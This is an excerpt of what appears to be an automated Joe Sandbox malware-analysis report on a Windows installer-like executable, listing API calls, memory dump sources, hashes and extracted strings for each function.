                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: AttributesFile
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                                                                                                                                                                        • Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19
                                                                                                                                                                                                                                                                                        Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: FileRead
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2738559852-0
                                                                                                                                                                                                                                                                                        • Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                                                                                                                                                                                                        • Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4
                                                                                                                                                                                                                                                                                        Function 004037F8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                                          • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                                          • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                                          • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                                        • CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Char$Next$CreateDirectoryPrev
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 4115351271-0
                                                                                                                                                                                                                                                                                        • Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                                                                                                                                                                                                                        • Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE
                                                                                                                                                                                                                                                                                        Function 00403DDB Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: MessageSend
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                        • Opcode ID: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                                                                                                                                                                                                                        • Instruction ID: 85c9fcbfeeb581dd75f9c62538f5ff43d76368f59f1a6e3d2bff8e12452ff276
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0FC04C75644201BBDA108B509D45F077759AB90701F1584257615F50E0C674D550D62C
                                                                                                                                                                                                                                                                                        Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: FilePointer
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 973152223-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                                                                                                                                                                                                        • Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C
                                                                                                                                                                                                                                                                                        Function 00403DC4 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: MessageSend
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                                                                                                                                                                                                                        • Instruction ID: 19f7ed481b0b3084dfc48602985d3e47af739273f13ec77122cd0735a5794091
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CCB01235181200BBDE514B00DE0AF867F62F7A8701F008574B305640F0C6B204E0DB09
                                                                                                                                                                                                                                                                                        Function 00403DB1 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CallbackDispatcherUser
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2492992576-0
                                                                                                                                                                                                                                                                                        • Opcode ID: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                                                                                                                                                                                                                        • Instruction ID: a171dc49094d5971c6211130fd655c06747b54d01a1b52cbafa865c71f5bacad
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2CA001BA845500ABCA439B60EF0988ABA62BBA5701B11897AE6565103587325864EB19

                                                                                                                                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                                                                                                                                        Function 004049A8 Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,000003F9), ref: 004049BF
                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,00000408), ref: 004049CC
                                                                                                                                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
                                                                                                                                                                                                                                                                                        • LoadBitmapW.USER32(0000006E), ref: 00404A2E
                                                                                                                                                                                                                                                                                        • SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
                                                                                                                                                                                                                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
                                                                                                                                                                                                                                                                                        • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
                                                                                                                                                                                                                                                                                        • DeleteObject.GDI32(?), ref: 00404AA5
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
                                                                                                                                                                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
                                                                                                                                                                                                                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(?,00000005), ref: 00404BFB
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
                                                                                                                                                                                                                                                                                        • ImageList_Destroy.COMCTL32(?), ref: 00404DC8
                                                                                                                                                                                                                                                                                        • GlobalFree.KERNEL32(?), ref: 00404DD8
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
                                                                                                                                                                                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(?,00000000), ref: 00404F75
                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,000003FE), ref: 00404F80
                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(00000000), ref: 00404F87
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                                                                                                                        • String ID: $ @$M$N
                                                                                                                                                                                                                                                                                        • API String ID: 1638840714-3479655940
                                                                                                                                                                                                                                                                                        • Opcode ID: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                                                                                                                                                                                                                        • Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58
                                                                                                                                                                                                                                                                                        Function 00406CC7 Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 190filestringCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
                                                                                                                                                                                                                                                                                        • lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
                                                                                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
                                                                                                                                                                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 00406D58
                                                                                                                                                                                                                                                                                        • FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
                                                                                                                                                                                                                                                                                        • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
                                                                                                                                                                                                                                                                                        • FindClose.KERNEL32(?), ref: 00406E5F
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        • Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
                                                                                                                                                                                                                                                                                        • Delete: DeleteFile failed("%s"), xrefs: 00406E29
                                                                                                                                                                                                                                                                                        • RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
                                                                                                                                                                                                                                                                                        • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
                                                                                                                                                                                                                                                                                        • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
                                                                                                                                                                                                                                                                                        • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
                                                                                                                                                                                                                                                                                        • ptF, xrefs: 00406D1A
                                                                                                                                                                                                                                                                                        • Delete: DeleteFile("%s"), xrefs: 00406DE8
                                                                                                                                                                                                                                                                                        • \*.*, xrefs: 00406D2F
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                                                                                                        • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
                                                                                                                                                                                                                                                                                        • API String ID: 2035342205-1650287579
                                                                                                                                                                                                                                                                                        • Opcode ID: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                                                                                                                                                                                                                        • Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE
                                                                                                                                                                                                                                                                                        Function 004044D1 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 300stringkeyboardCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,000003F0), ref: 00404525
                                                                                                                                                                                                                                                                                        • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,000003FB), ref: 00404553
                                                                                                                                                                                                                                                                                        • GetAsyncKeyState.USER32(00000010), ref: 0040455A
                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,000003F0), ref: 0040456F
                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
                                                                                                                                                                                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 004045AF
                                                                                                                                                                                                                                                                                        • SHBrowseForFolderW.SHELL32(?), ref: 00404669
                                                                                                                                                                                                                                                                                        • lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
                                                                                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
                                                                                                                                                                                                                                                                                        • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
                                                                                                                                                                                                                                                                                        • CoTaskMemFree.OLE32(00000000), ref: 00404674
                                                                                                                                                                                                                                                                                          • Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3
                                                                                                                                                                                                                                                                                          • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                                          • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                                          • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                                          • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                                          • Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB
                                                                                                                                                                                                                                                                                        • GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
